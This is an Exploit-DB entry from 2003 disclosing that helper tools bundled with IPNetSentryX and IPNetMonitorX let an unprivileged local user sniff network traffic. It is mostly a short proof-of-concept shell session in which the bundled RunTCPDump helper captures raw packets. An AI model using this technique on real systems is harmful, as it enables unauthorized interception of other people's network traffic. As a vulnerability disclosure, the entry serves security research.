IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability

2003-07-07T00:00:00
ID EDB-ID:22993
Type exploitdb
Reporter @stake
Modified 2003-07-07T00:00:00

Description

IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance Vulnerability. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/8365/info

It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance.

bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000